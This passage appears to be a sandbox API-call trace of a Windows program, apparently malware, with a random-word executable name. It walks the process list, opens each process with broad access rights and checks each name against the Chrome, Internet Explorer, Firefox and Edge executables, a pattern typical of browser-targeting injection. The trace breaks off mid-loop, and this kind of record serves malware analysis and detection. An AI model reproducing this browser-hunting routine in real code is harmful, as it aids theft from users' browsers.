	[0244.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0244.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8ed0
	[0244.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.323] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.323] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.323] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.324] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8ed4
	[0244.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.325] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.325] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.325] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.326] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.326] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0244.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8ed8
	[0244.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.327] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0244.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.327] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.327] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0244.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.328] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.329] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.329] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8edc
	[0244.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.329] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.330] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.330] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.330] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.330] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0244.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8ee0
	[0244.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.331] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0244.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.332] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.332] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0244.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.332] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.333] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0244.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8ee4
	[0244.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.334] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0244.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.334] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.334] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0244.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.335] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.335] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0244.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8ee8
	[0244.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.336] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0244.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.336] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.336] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0244.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.337] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.337] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0244.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8eec
	[0244.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.338] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.338] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.338] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.338] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.338] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8ef0
	[0244.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.339] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.340] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.340] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.340] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.340] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8ef4
	[0244.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.341] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.342] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.342] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.342] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.342] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8ef8
	[0244.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.344] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.345] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.345] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.345] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.346] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8efc
	[0244.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.346] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.347] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.347] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.347] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.348] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8f00
	[0244.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.348] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.349] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.349] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.349] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8f04
	[0244.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.351] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.351] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.351] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.351] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.352] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8f08
	[0244.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.353] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.353] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.353] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.353] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0244.354] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8f0c
	[0244.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.355] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0244.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.355] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.355] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0244.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.355] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.356] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8f10
	[0244.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.357] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.357] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.357] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.357] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.358] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0244.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8f14
	[0244.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.359] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.360] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.360] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.360] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.361] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.362] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8f18
	[0244.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.362] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.362] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.363] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8f1c
	[0244.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.364] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.365] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.365] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.365] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8f20
	[0244.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.367] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.367] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.368] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0244.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.368] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0244.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8f24
	[0244.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.369] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0244.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.370] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.370] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0244.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.371] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0244.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8f28
	[0244.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.372] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.373] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.373] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.374] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0244.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8f2c
	[0244.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.376] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0244.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.377] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.377] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0244.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.378] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0244.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0244.379] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0244.380] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8f30
	[0244.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
